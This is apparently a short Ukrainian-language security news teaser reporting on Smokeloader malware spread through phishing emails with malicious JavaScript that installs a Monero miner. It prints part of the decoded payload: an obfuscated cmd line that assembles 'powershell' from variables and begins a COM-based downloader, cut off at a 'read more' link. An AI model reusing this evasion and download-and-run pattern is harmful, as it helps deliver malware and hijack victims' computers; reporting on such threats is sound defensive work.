Поширення Monero Mining, через Smokeloader
Виявлено факт поширення шкідливого програмного забезпечення Smokeloader, який скачував на комп’ютери жертв програму для майнингу криптовалюти Monero. Поширення Smokeloader відбувається через розсилку поштових повідомлень зі злоякісним Javascript-ом. В самому Javascript шкідливий код зашифрований в виді Base64 і при розшифруванні виглядає так: cmd /k set _a1=pow&& set _a2=ersh&& set _a3=ell&& call %_a1%%_a2%%_a3% $http_request = New-Object -ComObject Msxml2.XMLHTTP;$adodb = New-Object -ComObjectADODB.Stream; $path = Читати далі…